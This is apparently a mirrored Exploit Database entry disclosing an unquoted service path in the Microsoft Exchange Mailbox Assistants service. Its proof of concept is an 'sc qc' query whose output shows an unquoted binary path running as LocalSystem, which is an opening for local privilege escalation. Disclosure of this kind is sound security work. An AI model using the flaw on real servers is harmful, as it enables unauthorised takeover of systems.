Microsoft Exchange Mailbox Assistants 15.0.847.40 – ‘Service MSExchangeMailboxAssistants’ Unquoted Service Path

• Exploit Database
• 13 阅读

• 作者： Antonio Cuomo
  日期： 2022-04-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50867/

• # Exploit Title: Microsoft Exchange Mailbox Assistants15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
  # Exploit Author: Antonio Cuomo (arkantolo)
  # Exploit Date: 2022-04-11
  # Vendor : Microsoft
  # Version : 15.0.847.40
  # Tested on OS: Microsoft Exchange Server 2013 SP1
  
  #PoC :
  ==============
  
  C:\>sc qc MSExchangeMailboxAssistants
  [SC] QueryServiceConfig OPERAZIONI RIUSCITE
  
  NOME_SERVIZIO: MSExchangeMailboxAssistants
  TIPO: 10WIN32_OWN_PROCESS
  TIPO_AVVIO: 2 AUTO_START
  CONTROLLO_ERRORE: 1 NORMAL
  NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe
  GRUPPO_ORDINE_CARICAMENTO : 
  TAG : 0
  NOME_VISUALIZZATO : Microsoft Exchange Mailbox Assistants
  DIPENDENZE:
  SERVICE_START_NAME : LocalSystem